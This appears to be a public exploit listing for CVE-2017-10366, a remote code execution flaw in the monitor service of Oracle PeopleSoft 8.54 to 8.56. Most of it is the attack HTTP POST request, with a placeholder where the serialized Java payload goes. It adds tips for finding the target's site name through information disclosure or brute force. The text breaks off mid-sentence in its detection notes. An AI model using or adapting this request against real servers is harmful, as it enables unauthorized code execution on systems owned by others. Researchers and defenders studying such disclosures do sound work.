# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 # Date: 30 Oct 2017 # Exploit Author: Vahagn Vardanyan # Vendor Homepage: Oracle # Software Link: Oracle PeopleSoft # Version: 8.54, 8.55, 8.56 # Tested on: Windows, Linux # CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366 The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56. POST /monitor/%SITE_NAME% HTTP/1.1 Host: PeopleSoft:PORT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Cookie:a=aa ASSJAVA_SERIALASS %SITE_NAME% - is a PeopleSoft "name" to get it you can use some information disclosure or brute force. information for automation detection: 1. If monitor component deployed and you don't know %SITE_NAME% then will get this type of error